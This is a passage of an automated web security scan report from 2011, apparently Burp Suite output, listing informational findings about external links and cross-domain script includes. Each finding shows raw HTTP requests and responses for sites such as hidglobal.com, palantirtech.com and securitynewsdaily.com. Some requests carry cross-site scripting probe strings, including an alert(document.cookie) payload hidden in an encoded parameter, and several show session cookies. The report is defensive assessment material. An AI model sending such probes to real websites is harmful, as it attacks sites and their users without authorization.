...[SNIP]...
<!-- The following links are written to the page by /includes_common2/includesTopOfPage.php -->
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js'></script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<li><a href="https://www.fargopartner.com/" target="_blank" onclick="var s=s_gi(s_account);s.linkTrackVars='prop12,events';s.prop12='en';s.linkTrackEvents='event23';s.tl(this,'o','Fargo Partners');">Fargo Partners</a>
...[SNIP]...
<img src="/images/greenbox_arrow.gif" width="9" height="9">&nbsp;&nbsp; <a href="https://orders.hidcorp.com/" target="_blank"><strong>
...[SNIP]...
<img src="/images/greenbox_arrow.gif" width="9" height="9">&nbsp;&nbsp; <a href="https://orders.hidcorp.com/cxref_info.asp" target="_blank"><strong>
...[SNIP]...
<div id="footer-logo"><a href="http://assaabloy.com/en/com/" target="_blank">ASSA ABLOY</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
       src="http://hidglobal.122.2o7.net/b/ss/hidDev/1/H.19.4--NS/0"
       height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

15.12. http://www.palantirtech.com/disclaimer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.palantirtech.com
Path:   /disclaimer.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /disclaimer.php?height=70 HTTP/1.1
Host: www.palantirtech.com
Proxy-Connection: keep-alive
Referer: http://www.palantirtech.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:51:42 GMT
Server: thttpd/2.25b
X-Powered-By: PHP/5.1.6
Content-Length: 1284
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">

h
...[SNIP]...
<strong><a href="http://www.palantir.net" rel="nofollow" target="_blank">Palantir.net</a></strong>, Inc. Palantir.net's website is
           located at <a href="http://www.palantir.net" rel="nofollow" target="_blank">www.palantir.net</a>
...[SNIP]...

15.13. http://www.securitynewsdaily.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securitynewsdaily.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_ads&format=raw&w=728&ad=106&ord=454835708718746900&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=a8a1f94d0e0aebfbc90d6bf95954acabbe45a2b7 HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:16 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2291

<html>
<head>
<link rel="stylesheet" href="/templates/security_news_daily/css/security_news_daily.css" type="text/css" />
<style type='text/css'>
body{

...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/tmn.securitynewsdaily/home_page;tile=1;sz=728x90;ord=1234567890?" target="_blank">
<img src="http://ad.doubleclick.net/ad/tmn.securitynewsdaily/home_page;tile=1;sz=728x90;ord=1234567890?" width="728" height="90" border="0" alt="Click Here" /></a>
...[SNIP]...

15.14. http://www.securitynewsdaily.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securitynewsdaily.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_ads&format=raw&w=300&ad=99&ord=454835708718746900&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=0f1dd3d09f7885410d7cea8cd0fbff710419c103 HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:16 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2331

<html>
<head>
<link rel="stylesheet" href="/templates/security_news_daily/css/security_news_daily.css" type="text/css" />
<style type='text/css'>
body{

...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/tmn.securitynewsdaily/home_page;tile=2;sz=300x250,300x600;ord=9876543210?" target="_blank">
<img src="http://ad.doubleclick.net/ad/tmn.securitynewsdaily/home_page;tile=2;sz=300x250,300x600;ord=9876543210?" width="300" border="0" alt="Click Here" /></a>
...[SNIP]...

15.15. http://www.securitynewsdaily.com/media/system/twittertweeter.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securitynewsdaily.com
Path:   /media/system/twittertweeter.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /media/system/twittertweeter.php?via=Security_SND&related=TechNewsDaily,TopTenREVIEWS,SPACEdotcom,ipnd,LiveScience,LLMysteries,OAPlanet,North_Orion,BNDarticles,MyHealth_MHND,Newsarama&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools%2F&text=Security+Tools+%26+Resources HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/tools/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878; __utmz=27158498.1297709852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27158498.1497794322.1297709852.1297709852.1297709852.1; __utmc=27158498; __utmb=27158498.1.10.1297709852; reaction_28=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:27 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 595

<html><head><meta name="robots" content="NOINDEX, NOFOLLOW"></head><body style="margin: 0px; padding: 0px;"><iframe src="http://platform.twitter.com/widgets/tweet_button.html?url=http://www.securitynewsdaily.com/tools/&via=Security_SND&text=Security%20Tools%20%26%20Resources&related=TechNewsDaily,TopTenREVIEWS,SPACEdotcom,ipnd,LiveScience,LLMysteries,OAPlanet,North_Orion,BNDarticles,MyHealth_MHND,Newsarama&count=horizontal" frameborder="0" width="110" height="20" scrolling="no" style="border:none; overflow:hidden; width:110px; height:20px;" allowTransparency="true"></iframe>
...[SNIP]...

15.16. http://www.webcastir.com/SlideShowView.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcastir.com
Path:   /SlideShowView.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /SlideShowView.asp?B=1475&S=MyGovernanceWebsite_2006_12_08 HTTP/1.1
Host: www.webcastir.com
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 14 Feb 2011 18:42:19 GMT
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 14 Feb 2011 18:41:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCARTCQDA=IDPPADGAMEICOJEGLGGGNGCJ; path=/
Vary: Accept-Encoding
Set-Cookie: Coyote-2-426f6d68=426f6d2c:0; path=/
Content-Length: 2597


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Slide 1</title>
<META name="ROBOTS" content="NOINDEX,NOFOLLOW">
<META HTTP-EQUIV="imagetoolbar" CONTENT="n
...[SNIP]...
<td><img name="Slide" id="Slide" border="1" src="http://www.b2i.cc/SlideShow/1475/MyGovernanceWebsite_2006_12_08/slide1.jpg"></td>
...[SNIP]...

16. Cross-domain script include  previous  next
There are 11 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


16.1. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.Media6/B3897970.8

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N1558.Media6/B3897970.8;sz=728x90;click0=http://ad.media6degrees.com/adserv/clk?tId=12497909247337382|cId=3211|cb=1297710111|notifyPort=8080|exId=20|tId=12497909247337382|ec=1|secId=57|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|advId=971|notifyServer=asd146.sd.pl.pvt|spId=27355|adType=iframe|invId=135|bid=1.61|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D;ord=1297710112102? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=12497909247337382|cb=1297710111|adType=iframe|cId=3211|ec=1|spId=27355|advId=971|exId=20|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|secId=57|invId=135|notifyServer=asd146.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8681
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 19:01:52 GMT
Expires: Mon, 14 Feb 2011 19:01:52 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Apr 29 18:34:20 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

16.2. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-1894578950532504&output=html&h=90&slotname=3983344906&w=728&channel=9120656992_3996339198&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.securitynewsdaily.com%2F6efdb'-alert(1)-'cf92265efad&dt=1297709919578&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297709919578&frm=1&adk=2785858344&ga_vid=1721385893.1297709920&ga_sid=1297709920&ga_hid=1335491175&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1097&bih=1010&ifk=1769145327&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/index.php?option=com_ads&format=raw&w=728&ad=106&ord=661057325778529000&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=a8a1f94d0e0aebfbc90d6bf95954acabbe45a2b7
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 18:58:24 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4177

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

16.3. https://support.palantir.com/pg/login.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.palantir.com
Path:   /pg/login.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pg/login.do HTTP/1.1
Host: support.palantir.com
Connection: keep-alive
Referer: https://support.palantir.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F3A71652B86046597A441E158CEE25D6

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>

<script src="https://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

16.4. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools%2F&title=Security+Tools+%26+Resources&layout=button_count&show_faces=true&width=100&action=like&font=trebuchet+ms&colorscheme=light&height=25 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/tools/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwashingtonpost.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.washingtonpost.com%252Fwp-dyn%252Fcontent%252Farticle%252F2011%252F02%252F13%252FAR2011021301463.html%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 14 Feb 2011 18:57:28 GMT
Content-Length: 7736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y_/r/txqM0K8lHHk.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/y_/r/Thkb_AZ80FK.js"></script>
...[SNIP]...

16.5. http://www.hidglobal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:28:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28876

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" id="sixapart-standard">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title>HID Global - Sec
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" title="colorbox" href="http://www.hidglobal.com/main/css/colorbox.css" />


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js"> </script>
...[SNIP]...

16.6. http://www.hidglobal.com/onlineOrderStatusRegistration.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /onlineOrderStatusRegistration.php HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=kr9b485jm7dv1f9g8un99oala4; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26ACBA4A851D330C-6000012840002166[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- The following links are written to the page by /includes_common2/includesTopOfPage.php -->
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js'></script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js'></script>
...[SNIP]...

16.7. http://www.hidglobal.com/page.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /page.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page.php?page_id=223 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=tsr2bhqkbe82vdltq8p1hv3r43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<!-- The following links are written to the page by /includes_common2/includesTopOfPage.php -->
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js'></script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...

16.8. http://www.palantirtech.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.palantirtech.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.palantirtech.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:51:42 GMT
Server: thttpd/2.25b
X-Powered-By: PHP/5.1.6
X-Pingback: /_ptwp_live_ect0/xmlrpc.php
Content-Length: 6826
